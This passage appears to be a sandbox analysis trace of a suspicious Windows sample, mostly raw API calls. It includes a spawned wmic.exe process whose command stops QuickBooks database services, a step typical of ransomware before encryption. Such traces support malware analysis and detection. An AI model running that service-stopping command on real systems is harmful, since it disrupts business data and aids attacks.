[0255.732] free (_Block=0x2ac7a0) [0255.732] free (_Block=0x2ac7c0) [0255.732] free (_Block=0x2a82c0) [0255.732] free (_Block=0x2ac7e0) [0255.732] free (_Block=0x2ac800) [0255.732] free (_Block=0x2a8300) [0255.732] free (_Block=0x2ac920) [0255.732] free (_Block=0x2ac940) [0255.732] free (_Block=0x2a8440) [0255.732] free (_Block=0x2ac960) [0255.732] free (_Block=0x2ac980) [0255.733] free (_Block=0x2a8480) [0255.733] free (_Block=0x2ac6e0) [0255.733] free (_Block=0x2ac700) [0255.733] free (_Block=0x2a8200) [0255.733] free (_Block=0x2ac5a0) [0255.733] free (_Block=0x2ac5c0) [0255.733] free (_Block=0x2a80c0) [0255.733] free (_Block=0x2ac560) [0255.733] free (_Block=0x2ac580) [0255.733] free (_Block=0x2a8080) [0255.733] free (_Block=0x2ac620) [0255.733] free (_Block=0x2ac640) [0255.733] free (_Block=0x2a8140) [0255.733] free (_Block=0x2ac720) [0255.733] free (_Block=0x2ac740) [0255.733] free (_Block=0x2a8240) [0255.733] free (_Block=0x2ac5e0) [0255.733] free (_Block=0x2ac600) [0255.733] free (_Block=0x2a8100) [0255.734] free (_Block=0x2ac660) [0255.734] free (_Block=0x2ac680) [0255.734] free (_Block=0x2a8180) [0255.734] free (_Block=0x2ac6a0) [0255.734] free (_Block=0x2ac6c0) [0255.734] free (_Block=0x2a81c0) [0255.734] free (_Block=0x2ac760) [0255.734] free (_Block=0x2ac780) [0255.734] free (_Block=0x2a8280) [0255.734] CoUninitialize () [0255.774] exit (_Code=0) [0255.774] free (_Block=0x2a6ef0) [0255.774] free (_Block=0x2a7f30) [0255.774] ??1CHString@@QEAA@XZ () returned 0x7fef926482c [0255.774] free (_Block=0x2a6fe0) [0255.774] free (_Block=0x2a6ae0) [0255.775] free (_Block=0x2a7ef0) [0255.775] free (_Block=0x2a7eb0) [0255.775] free (_Block=0x2a7e60) [0255.775] free (_Block=0x2a7e20) [0255.775] free (_Block=0x2a5ac0) [0255.775] free (_Block=0x2a7da0) [0255.775] free (_Block=0x2a5a80) [0255.775] ??1CHString@@QEAA@XZ () returned 0x7fef926482c [0255.775] free (_Block=0x2a85c0) Thread: id = 224 os_tid = 0x8e0 Thread: id = 225 os_tid = 0x648 Thread: id = 226 os_tid = 0xb70 Thread: id = 227 os_tid = 0xadc Thread: id = 228 os_tid = 0x748 Process: id = "28" image_name = "wmic.exe" filename = "c:\\windows\\system32\\wbem\\wmic.exe" page_root = "0x1ea37000" os_pid = "0xafc" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "4" os_parent_pid = "0x860" cmd_line = "\"C:\\Windows\\System32\\Wbem\\WMIC.exe\" path Win32_Service where \"name like '%%QuickBooksDB%%'\" call stopservice" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb41" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 231 os_tid = 0xa48 [0256.013] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fa70 | out: lpSystemTimeAsFileTime=0x18fa70*(dwLowDateTime=0xadf326e0, dwHighDateTime=0x1d61d49)) [0256.013] GetCurrentProcessId () returned 0xafc [0256.013] GetCurrentThreadId () returned 0xa48 [0256.013] GetTickCount () returned 0x1169963 [0256.013] QueryPerformanceCounter (in: lpPerformanceCount=0x18fa78 | out: lpPerformanceCount=0x18fa78*=37618640173) returned 1 [0256.017] GetModuleHandleW (lpModuleName=0x0) returned 0xffc50000 [0256.017] __set_app_type (_Type=0x1) [0256.017] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0xffc9ced0) returned 0x0 [0256.017] __wgetmainargs (in: _Argc=0xffcc2380, _Argv=0xffcc2390, _Env=0xffcc2388, _DoWildCard=0, _StartInfo=0xffcc239c | out: _Argc=0xffcc2380, _Argv=0xffcc2390, _Env=0xffcc2388) returned 0 [0256.018] ??0CHString@@QEAA@XZ () returned 0xffcc2ab0 [0256.018] malloc (_Size=0x30) returned 0x2b5a80 [0256.018] malloc (_Size=0x70) returned 0x2b7dc0 [0256.018] malloc (_Size=0x50) returned 0x2b5ac0 [0256.018] malloc (_Size=0x30) returned 0x2b7e40 [0256.018] malloc (_Size=0x48) returned 0x2b7e80 [0256.018] malloc (_Size=0x30) returned 0x2b7ed0 [0256.018] malloc (_Size=0x30) returned 0x2b7f10 [0256.018] ??0CHString@@QEAA@XZ () returned 0xffcc2f58 [0256.018] malloc (_Size=0x30) returned 0x2b7f50 [0256.018] ?Empty@CHString@@QEAAXXZ () returned 0x7fef926482c [0256.018] SetConsoleCtrlHandler (HandlerRoutine=0xffc95724, Add=1) returned 1 [0256.019] _onexit (_Func=0xffcaf378) returned 0xffcaf378 [0256.019] _onexit (_Func=0xffcaf490) returned 0xffcaf490 [0256.019] _onexit (_Func=0xffcaf4d0) returned 0xffcaf4d0 [0256.019] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0256.019] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0 [0256.024] CoInitializeSecurity (pSecDesc=0x0, cAuthSvc=-1, asAuthSvc=0x0, pReserved1=0x0, dwAuthnLevel=0x1, dwImpLevel=0x3, pAuthList=0x0, dwCapabilities=0x0, pReserved3=0x0) returned 0x0 [0256.035] CoCreateInstance (in: rclsid=0xffc573a0*(Data1=0x4590f811, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), pUnkOuter=0x0, dwClsContext=0x1, riid=0xffc57370*(Data1=0xdc12a687, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppv=0xffcc2940 | out: ppv=0xffcc2940*=0x1c31390) returned 0x0 [0256.049] GetCurrentProcess () returned 0xffffffffffffffff [0256.049] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x28, TokenHandle=0x18f840 | out: TokenHandle=0x18f840*=0xf4) returned 1 [0256.049] GetTokenInformation (in: TokenHandle=0xf4, TokenInformationClass=0x3, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x18f838 | out: TokenInformation=0x0, ReturnLength=0x18f838) returned 0 [0256.050] malloc (_Size=0x118) returned 0x2b69a0 [0256.050] GetTokenInformation (in: TokenHandle=0xf4, TokenInformationClass=0x3, TokenInformation=0x2b69a0, TokenInformationLength=0x118, ReturnLength=0x18f838 | out: TokenInformation=0x2b69a0, ReturnLength=0x18f838) returned 1 [0256.050] AdjustTokenPrivileges (in: TokenHandle=0xf4, DisableAllPrivileges=0, NewState=0x2b69a0*(PrivilegesCount=0x17, Privileges=((Luid.LowPart=0x5, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x0, Luid.HighPart=2, Attributes=0x9), (Luid.LowPart=0x2, Luid.HighPart=10, Attributes=0x0), (Luid.LowPart=0xb, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x0, Luid.HighPart=2, Attributes=0xd), (Luid.LowPart=0x2, Luid.HighPart=14, Attributes=0x0), (Luid.LowPart=0xf, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x0, Luid.HighPart=2, Attributes=0x12), (Luid.LowPart=0x2, Luid.HighPart=19, Attributes=0x0), (Luid.LowPart=0x14, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x0, Luid.HighPart=2, Attributes=0x17), (Luid.LowPart=0x3, Luid.HighPart=24, Attributes=0x0), (Luid.LowPart=0x19, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x0, Luid.HighPart=2, Attributes=0x1d), (Luid.LowPart=0x3, Luid.HighPart=30, Attributes=0x0), (Luid.LowPart=0x21, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x0, Luid.HighPart=2, Attributes=0x23), (Luid.LowPart=0x2, Luid.HighPart=1954374117, Attributes=0x1d2a), (Luid.LowPart=0x0, Luid.HighPart=2850704, Attributes=0x0), (Luid.LowPart=0x690057, Luid.HighPart=6553710, Attributes=0x77006f), (Luid.LowPart=0x790053, Luid.HighPart=7602291, Attributes=0x6d0065), (Luid.LowPart=0x57005c, Luid.HighPart=7209065, Attributes=0x6f0064), (Luid.LowPart=0x6f0050, Luid.HighPart=6619255, Attributes=0x530072))), BufferLength=0x0, PreviousState=0x0, ReturnLength=0x0 | out: PreviousState=0x0, ReturnLength=0x0) returned 1 [0256.050] free (_Block=0x2b69a0) [0256.050] CloseHandle (hObject=0xf4) returned 1 [0256.050] malloc (_Size=0x40) returned 0x2b69a0 [0256.050] malloc (_Size=0x40) returned 0x2b69f0 [0256.050] malloc (_Size=0x40) returned 0x2b6a40 [0256.050] malloc (_Size=0x20a) returned 0x2b6a90 [0256.050] GetSystemDirectoryW (in: lpBuffer=0x2b6a90, uSize=0x105 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0256.051] free (_Block=0x2b6a90) [0256.051] malloc (_Size=0x18) returned 0x2b7f90 [0256.051] malloc (_Size=0x18) returned 0x2b7fb0 [0256.051] malloc (_Size=0x18) returned 0x2b6a90 [0256.051] SysStringLen (param_1="C:\\Windows\\system32") returned 0x13 [0256.051] SysStringLen (param_1="\\kernel32.dll") returned 0xd [0256.051] free (_Block=0x2b7f90) [0256.051] free (_Block=0x2b7fb0) [0256.051] LoadLibraryW (lpLibFileName="C:\\Windows\\system32\\kernel32.dll") returned 0x77940000 [0256.051] GetProcAddress (hModule=0x77940000, lpProcName="SetThreadUILanguage") returned 0x77956d40 [0256.051] SetThreadUILanguage (LangId=0x0) returned 0x7fffffd0409 [0256.052] FreeLibrary (hLibModule=0x77940000) returned 1 [0256.052] free (_Block=0x2b6a90) [0256.052] _vsnwprintf (in: _Buffer=0x2b6a40, _BufferCount=0x1f, _Format="ms_%x", _ArgList=0x18f468 | out: _Buffer="ms_409") returned 6 [0256.052] malloc (_Size=0x20) returned 0x2b7f90 [0256.052] GetComputerNameW (in: lpBuffer=0x2b7f90, nSize=0x18f840 | out: lpBuffer="XDUWTFONO", nSize=0x18f840) returned 1 [0256.053] lstrlenW (lpString="XDUWTFONO") returned 9 [0256.053] malloc (_Size=0x14) returned 0x2b6a90 [0256.053] lstrlenW (lpString="XDUWTFONO") returned 9 [0256.053] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x0, nSize=0x18f838 | out: lpNameBuffer=0x0, nSize=0x18f838) returned 0x7fffffdd000 [0256.054] GetLastError () returned 0xea [0256.054] malloc (_Size=0x40) returned 0x2b6ab0 [0256.054] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x2b6ab0, nSize=0x18f838 | out: lpNameBuffer="XDUWTFONO\\5p5NrGJn0jS HALPmcxz", nSize=0x18f838) returned 0x1 [0256.054] lstrlenW (lpString="") returned 0 [0256.054] lstrlenW (lpString="XDUWTFONO") returned 9 [0256.054] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="XDUWTFONO", cchCount1=9, lpString2="", cchCount2=0) returned 3 [0256.057] lstrlenW (lpString=".") returned 1 [0256.057] lstrlenW (lpString="XDUWTFONO") returned 9 [0256.057] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="XDUWTFONO", cchCount1=9, lpString2=".", cchCount2=1) returned 3 [0256.057] lstrlenW (lpString="LOCALHOST") returned 9 [0256.057] lstrlenW (lpString="XDUWTFONO") returned 9 [0256.057] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="XDUWTFONO", cchCount1=9, lpString2="LOCALHOST", cchCount2=9) returned 3 [0256.057] lstrlenW (lpString="XDUWTFONO") returned 9 [0256.057] lstrlenW (lpString="XDUWTFONO") returned 9 [0256.057] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="XDUWTFONO", cchCount1=9, lpString2="XDUWTFONO", cchCount2=9) returned 2 [0256.057] free (_Block=0x2b6a90) [0256.057] lstrlenW (lpString="XDUWTFONO") returned 9 [0256.057] malloc (_Size=0x14) returned 0x2b6a90 [0256.057] lstrlenW (lpString="XDUWTFONO") returned 9 [0256.057] lstrlenW (lpString="XDUWTFONO") returned 9 [0256.057] malloc (_Size=0x14) returned 0x2b6b00 [0256.057] lstrlenW (lpString="XDUWTFONO") returned 9 [0256.057] malloc (_Size=0x8) returned 0x2b6b20 [0256.057] malloc (_Size=0x18) returned 0x2b6b40 [0256.058] malloc (_Size=0x30) returned 0x2b6b60 [0256.058] malloc (_Size=0x18) returned 0x2b6ba0 [0256.058] SysStringLen (param_1="IDENTIFY") returned 0x8 [0256.058] SysStringLen (param_1="ANONYMOUS") returned 0x9 [0256.058] SysStringLen (param_1="ANONYMOUS") returned 0x9 [0256.058] SysStringLen (param_1="IDENTIFY") returned 0x8 [0256.058] malloc (_Size=0x30) returned 0x2b6bc0 [0256.058] malloc (_Size=0x18) returned 0x2b6c00 [0256.058] SysStringLen (param_1="IMPERSONATE") returned 0xb [0256.058] SysStringLen (param_1="ANONYMOUS") returned 0x9 [0256.058] SysStringLen (param_1="IMPERSONATE") returned 0xb [0256.058] SysStringLen (param_1="IDENTIFY") returned 0x8 [0256.058] SysStringLen (param_1="IDENTIFY") returned 0x8 [0256.058] SysStringLen (param_1="IMPERSONATE") returned 0xb [0256.058] malloc (_Size=0x30) returned 0x2b6c20 [0256.058] malloc (_Size=0x18) returned 0x2b6c60 [0256.058] SysStringLen (param_1="DELEGATE") returned 0x8 [0256.058] SysStringLen (param_1="IDENTIFY") returned 0x8 [0256.058] SysStringLen (param_1="DELEGATE") returned 0x8 [0256.058] SysStringLen (param_1="ANONYMOUS") returned 0x9 [0256.058] SysStringLen (param_1="ANONYMOUS") returned 0x9 [0256.058] SysStringLen (param_1="DELEGATE") returned 0x8 [0256.058] malloc (_Size=0x30) returned 0x2b6c80 [0256.058] malloc (_Size=0x18) returned 0x2b6cc0 [0256.058] malloc (_Size=0x30) returned 0x2b6ce0 [0256.058] malloc (_Size=0x18) returned 0x2b6d20 [0256.059] SysStringLen (param_1="NONE") returned 0x4 [0256.059] SysStringLen (param_1="DEFAULT") returned 0x7 [0256.059] SysStringLen (param_1="DEFAULT") returned 0x7 [0256.059] SysStringLen (param_1="NONE") returned 0x4 [0256.059] malloc (_Size=0x30) returned 0x2b6d40 [0256.059] malloc (_Size=0x18) returned 0x2b6d80 [0256.059] SysStringLen (param_1="CONNECT") returned 0x7 [0256.059] SysStringLen (param_1="DEFAULT") returned 0x7 [0256.059] malloc (_Size=0x30) returned 0x2b6da0 [0256.059] malloc (_Size=0x18) returned 0x2b6de0 [0256.059] SysStringLen (param_1="CALL") returned 0x4 [0256.059] SysStringLen (param_1="DEFAULT") returned 0x7 [0256.059] SysStringLen (param_1="CALL") returned 0x4 [0256.059] SysStringLen (param_1="CONNECT") returned 0x7 [0256.059] malloc (_Size=0x30) returned 0x2b6e00 [0256.059] malloc (_Size=0x18) returned 0x2b6e40 [0256.059] SysStringLen (param_1="PKT") returned 0x3 [0256.059] SysStringLen (param_1="DEFAULT") returned 0x7 [0256.059] SysStringLen (param_1="PKT") returned 0x3 [0256.059] SysStringLen (param_1="NONE") returned 0x4 [0256.059] SysStringLen (param_1="NONE") returned 0x4 [0256.059] SysStringLen (param_1="PKT") returned 0x3 [0256.059] malloc (_Size=0x30) returned 0x2b6e60 [0256.059] malloc (_Size=0x18) returned 0x2b6ea0 [0256.059] SysStringLen (param_1="PKTINTEGRITY") returned 0xc [0256.059] SysStringLen (param_1="DEFAULT") returned 0x7 [0256.060] SysStringLen (param_1="PKTINTEGRITY") returned 0xc [0256.060] SysStringLen (param_1="NONE") returned 0x4 [0256.060] SysStringLen (param_1="PKTINTEGRITY") returned 0xc [0256.060] SysStringLen (param_1="PKT") returned 0x3 [0256.060] SysStringLen (param_1="PKT") returned 0x3 [0256.060] SysStringLen (param_1="PKTINTEGRITY") returned 0xc [0256.060] malloc (_Size=0x30) returned 0x2b8000 [0256.060] malloc (_Size=0x18) returned 0x2b6ec0 [0256.060] SysStringLen (param_1="PKTPRIVACY") returned 0xa [0256.060] SysStringLen (param_1="DEFAULT") returned 0x7 [0256.061] SysStringLen (param_1="PKTPRIVACY") returned 0xa [0256.061] SysStringLen (param_1="PKT") returned 0x3 [0256.061] SysStringLen (param_1="PKTPRIVACY") returned 0xa [0256.061] SysStringLen (param_1="PKTINTEGRITY") returned 0xc [0256.061] SysStringLen (param_1="PKTINTEGRITY") returned 0xc [0256.061] SysStringLen (param_1="PKTPRIVACY") returned 0xa [0256.061] malloc (_Size=0x30) returned 0x2b8040 [0256.061] malloc (_Size=0x40) returned 0x2b6ee0 [0256.061] malloc (_Size=0x20a) returned 0x2b6f30 [0256.061] GetSystemDirectoryW (in: lpBuffer=0x2b6f30, uSize=0x105 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0256.061] free (_Block=0x2b6f30) [0256.061] malloc (_Size=0x18) returned 0x2b6f30 [0256.061] malloc (_Size=0x18) returned 0x2b6f50 [0256.061] malloc (_Size=0x18) returned 0x2b6f70 [0256.061] SysStringLen (param_1="C:\\Windows\\system32") returned 0x13 [0256.061] SysStringLen (param_1="\\wbem\\") returned 0x6 [0256.061] free (_Block=0x2b6f30) [0256.061] free (_Block=0x2b6f50) [0256.061] SysStringByteLen (bstr="C:\\Windows\\system32\\wbem\\") returned 0x32 [0256.062] free (_Block=0x2b6f70) [0256.062] malloc (_Size=0x18) returned 0x2b6f30 [0256.062] malloc (_Size=0x18) returned 0x2b6f50 [0256.062] malloc (_Size=0x18) returned 0x2b6f70 [0256.062] SysStringLen (param_1="C:\\Windows\\system32\\wbem\\") returned 0x19 [0256.062] SysStringLen (param_1="XSL-Mappings.xml") returned 0x10 [0256.062] free (_Block=0x2b6f30) [0256.062] free (_Block=0x2b6f50) [0256.062] GetCurrentThreadId () returned 0xa48 [0256.062] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SOFTWARE\\Microsoft\\Wbem\\CIMOM", ulOptions=0x0, samDesired=0x1, phkResult=0x18f140 | out: phkResult=0x18f140*=0xf8) returned 0x0 [0256.062] RegQueryValueExW (in: hKey=0xf8, lpValueName="Logging", lpReserved=0x0, lpType=0x0, lpData=0x18f190, lpcbData=0x18f130*=0x400 | out: lpType=0x0, lpData=0x18f190*=0x30, lpcbData=0x18f130*=0x4) returned 0x0 [0256.062] _wcsicmp (_String1="0", _String2="1") returned -1 [0256.062] _wcsicmp (_String1="0", _String2="2") returned -2 [0256.062] RegQueryValueExW (in: hKey=0xf8, lpValueName="Logging Directory", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x18f130*=0x4 | out: lpType=0x0, lpData=0x0, lpcbData=0x18f130*=0x42) returned 0x0 [0256.062] malloc (_Size=0x86) returned 0x2b6f90 [0256.062] RegQueryValueExW (in: hKey=0xf8, lpValueName="Logging Directory", lpReserved=0x0, lpType=0x0, lpData=0x2b6f90, lpcbData=0x18f130*=0x42 | out: lpType=0x0, lpData=0x2b6f90*=0x25, lpcbData=0x18f130*=0x42) returned 0x0 [0256.063] lstrlenW (lpString="%systemroot%\\system32\\wbem\\Logs\\") returned 32 [0256.063] malloc (_Size=0x42) returned 0x2b7020 [0256.063] lstrlenW (lpString="%systemroot%\\system32\\wbem\\Logs\\") returned 32 [0256.063] RegQueryValueExW (in: hKey=0xf8, lpValueName="Log File Max Size", lpReserved=0x0, lpType=0x0, lpData=0x18f190, lpcbData=0x18f130*=0x400 | out: lpType=0x0, lpData=0x18f190*=0x36, lpcbData=0x18f130*=0xc) returned 0x0 [0256.063] _wtol (_String="65536") returned 65536 [0256.063] free (_Block=0x2b6f90) [0256.063] RegCloseKey (hKey=0x0) returned 0x6 [0256.063] CoCreateInstance (in: rclsid=0xffc57410*(Data1=0xf6d90f12, Data2=0x9c73, Data3=0x11d3, Data4=([0]=0xb3, [1]=0x2e, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0xb, [7]=0xb4)), pUnkOuter=0x0, dwClsContext=0x1, riid=0xffc573f0*(Data1=0x2933bf95, Data2=0x7b36, Data3=0x11d2, Data4=([0]=0xb2, [1]=0xe, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x98, [6]=0x3e, [7]=0x60)), ppv=0x18f638 | out: ppv=0x18f638*=0x21e71d0) returned 0x0 [0256.086] FreeThreadedDOMDocument:IXMLDOMDocument:load (in: This=0x21e71d0, xmlSource=0x18f780*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="C:\\Windows\\system32\\wbem\\XSL-Mappings.xml", varVal2=0x2b6f30), isSuccessful=0x18f7f0 | out: isSuccessful=0x18f7f0*=0xffff) returned 0x0 [0256.251] FreeThreadedDOMDocument:IXMLDOMDocument:get_documentElement (in: This=0x21e71d0, DOMElement=0x18f630 | out: DOMElement=0x18f630*=0x21ebc50) returned 0x0 [0256.254] malloc (_Size=0x18) returned 0x2b6f30 [0256.254] IXMLDOMElement:getElementsByTagName (in: This=0x21ebc50, tagName="XSLFORMAT", resultList=0x18f640 | out: resultList=0x18f640*=0x21e9cc0) returned 0x0 [0256.255] free (_Block=0x2b6f30) [0256.255] IXMLDOMNodeList:get_length (in: This=0x21e9cc0, listLength=0x18f808 | out: listLength=0x18f808*=21) returned 0x0 [0256.255] IXMLDOMNodeList:get_item (in: This=0x21e9cc0, index=0, listItem=0x18f610 | out: listItem=0x18f610*=0x21ebd50) returned 0x0 [0256.255] IXMLDOMNode:get_text (in: This=0x21ebd50, text=0x18f620 | out: text=0x18f620*="texttable.xsl") returned 0x0 [0256.255] IXMLDOMNode:get_attributes (in: This=0x21ebd50, attributeMap=0x18f618 | out: attributeMap=0x18f618*=0x21e78d0) returned 0x0 [0256.256] malloc (_Size=0x18) returned 0x2b6f30 [0256.256] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x21e78d0, name="KEYWORD", namedItem=0x18f628 | out: namedItem=0x18f628*=0x21ea280) returned 0x0 [0256.256] free (_Block=0x2b6f30) [0256.256] IXMLDOMNode:get_nodeValue (in: This=0x21ea280, value=0x18f660 | out: value=0x18f660*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="TABLE", varVal2=0x4)) returned 0x0 [0256.256] malloc (_Size=0x18) returned 0x2b6f30 [0256.256] malloc (_Size=0x18) returned 0x2b6f50 [0256.256] malloc (_Size=0x30) returned 0x2b8080 [0256.256] IUnknown:Release (This=0x21ebd50) returned 0x0 [0256.256] IUnknown:Release (This=0x21e78d0) returned 0x0 [0256.256] IUnknown:Release (This=0x21ea280) returned 0x0 [0256.256] IXMLDOMNodeList:get_item (in: This=0x21e9cc0, index=1, listItem=0x18f610 | out: listItem=0x18f610*=0x21ebd50) returned 0x0 [0256.257] IXMLDOMNode:get_text (in: This=0x21ebd50, text=0x18f620 | out: text=0x18f620*="textvaluelist.xsl") returned 0x0 [0256.257] IXMLDOMNode:get_attributes (in: This=0x21ebd50, attributeMap=0x18f618 | out: attributeMap=0x18f618*=0x21e78d0) returned 0x0 [0256.257] malloc (_Size=0x18) returned 0x2b6f90 [0256.257] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x21e78d0, name="KEYWORD", namedItem=0x18f628 | out: namedItem=0x18f628*=0x21ea280) returned 0x0 [0256.257] free (_Block=0x2b6f90) [0256.257] IXMLDOMNode:get_nodeValue (in: This=0x21ea280, value=0x18f660 | out: value=0x18f660*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="VALUE", varVal2=0x4)) returned 0x0 [0256.257] malloc (_Size=0x18) returned 0x2bc560 [0256.257] malloc (_Size=0x18) returned 0x2bc580 [0256.257] SysStringLen (param_1="VALUE") returned 0x5 [0256.257] SysStringLen (param_1="TABLE") returned 0x5 [0256.257] SysStringLen (param_1="TABLE") returned 0x5 [0256.257] SysStringLen (param_1="VALUE") returned 0x5 [0256.257] malloc (_Size=0x30) returned 0x2b80c0 [0256.257] IUnknown:Release (This=0x21ebd50) returned 0x0 [0256.257] IUnknown:Release (This=0x21e78d0) returned 0x0 [0256.257] IUnknown:Release (This=0x21ea280) returned 0x0 [0256.257] IXMLDOMNodeList:get_item (in: This=0x21e9cc0, index=2, listItem=0x18f610 | out: listItem=0x18f610*=0x21ebd50) returned 0x0 [0256.258] IXMLDOMNode:get_text (in: This=0x21ebd50, text=0x18f620 | out: text=0x18f620*="textvaluelist.xsl") returned 0x0 [0256.258] IXMLDOMNode:get_attributes (in: This=0x21ebd50, attributeMap=0x18f618 | out: attributeMap=0x18f618*=0x21e78d0) returned 0x0 [0256.258] malloc (_Size=0x18) returned 0x2bc5a0 [0256.258] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x21e78d0, name="KEYWORD", namedItem=0x18f628 | out: namedItem=0x18f628*=0x21ea280) returned 0x0 [0256.258] free (_Block=0x2bc5a0) [0256.258] IXMLDOMNode:get_nodeValue (in: This=0x21ea280, value=0x18f660 | out: value=0x18f660*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="LIST", varVal2=0x4)) returned 0x0 [0256.258] malloc (_Size=0x18) returned 0x2bc5a0 [0256.258] malloc (_Size=0x18) returned 0x2bc5c0 [0256.258] SysStringLen (param_1="LIST") returned 0x4 [0256.258] SysStringLen (param_1="TABLE") returned 0x5 [0256.258] malloc (_Size=0x30) returned 0x2b8100 [0256.258] IUnknown:Release (This=0x21ebd50) returned 0x0 [0256.258] IUnknown:Release (This=0x21e78d0) returned 0x0 [0256.258] IUnknown:Release (This=0x21ea280) returned 0x0 [0256.258] IXMLDOMNodeList:get_item (in: This=0x21e9cc0, index=3, listItem=0x18f610 | out: listItem=0x18f610*=0x21ebd50) returned 0x0 [0256.259] IXMLDOMNode:get_text (in: This=0x21ebd50, text=0x18f620 | out: text=0x18f620*="rawxml.xsl") returned 0x0 [0256.259] IXMLDOMNode:get_attributes (in: This=0x21ebd50, attributeMap=0x18f618 | out: attributeMap=0x18f618*=0x21e78d0) returned 0x0 [0256.259] malloc (_Size=0x18) returned 0x2bc5e0 [0256.259] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x21e78d0, name="KEYWORD", namedItem=0x18f628 | out: namedItem=0x18f628*=0x21ea280) returned 0x0 [0256.259] free (_Block=0x2bc5e0) [0256.259] IXMLDOMNode:get_nodeValue (in: This=0x21ea280, value=0x18f660 | out: value=0x18f660*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="RAWXML", varVal2=0x4)) returned 0x0 [0256.259] malloc (_Size=0x18) returned 0x2bc5e0 [0256.259] malloc (_Size=0x18) returned 0x2bc600 [0256.259] SysStringLen (param_1="RAWXML") returned 0x6 [0256.259] SysStringLen (param_1="TABLE") returned 0x5 [0256.259] SysStringLen (param_1="RAWXML") returned 0x6 [0256.259] SysStringLen (param_1="LIST") returned 0x4 [0256.259] SysStringLen (param_1="LIST") returned 0x4 [0256.259] SysStringLen (param_1="RAWXML") returned 0x6 [0256.259] malloc (_Size=0x30) returned 0x2b8140 [0256.259] IUnknown:Release (This=0x21ebd50) returned 0x0 [0256.259] IUnknown:Release (This=0x21e78d0) returned 0x0 [0256.259] IUnknown:Release (This=0x21ea280) returned 0x0 [0256.259] IXMLDOMNodeList:get_item (in: This=0x21e9cc0, index=4, listItem=0x18f610 | out: listItem=0x18f610*=0x21ebd50) returned 0x0 [0256.260] IXMLDOMNode:get_text (in: This=0x21ebd50, text=0x18f620 | out: text=0x18f620*="htable.xsl") returned 0x0 [0256.260] IXMLDOMNode:get_attributes (in: This=0x21ebd50, attributeMap=0x18f618 | out: attributeMap=0x18f618*=0x21e78d0) returned 0x0 [0256.260] malloc (_Size=0x18) returned 0x2bc620 [0256.260] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x21e78d0, name="KEYWORD", namedItem=0x18f628 | out: namedItem=0x18f628*=0x21ea280) returned 0x0 [0256.260] free (_Block=0x2bc620) [0256.260] IXMLDOMNode:get_nodeValue (in: This=0x21ea280, value=0x18f660 | out: value=0x18f660*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="HTABLE", varVal2=0x4)) returned 0x0 [0256.260] malloc (_Size=0x18) returned 0x2bc620 [0256.260] malloc (_Size=0x18) returned 0x2bc640 [0256.260] SysStringLen (param_1="HTABLE") returned 0x6 [0256.260] SysStringLen (param_1="TABLE") returned 0x5 [0256.260] SysStringLen (param_1="HTABLE") returned 0x6 [0256.260] SysStringLen (param_1="LIST") returned 0x4 [0256.260] malloc (_Size=0x30) returned 0x2b8180 [0256.260] IUnknown:Release (This=0x21ebd50) returned 0x0 [0256.260] IUnknown:Release (This=0x21e78d0) returned 0x0 [0256.261] IUnknown:Release (This=0x21ea280) returned 0x0 [0256.261] IXMLDOMNodeList:get_item (in: This=0x21e9cc0, index=5, listItem=0x18f610 | out: listItem=0x18f610*=0x21ebd50) returned 0x0 [0256.261] IXMLDOMNode:get_text (in: This=0x21ebd50, text=0x18f620 | out: text=0x18f620*="hform.xsl") 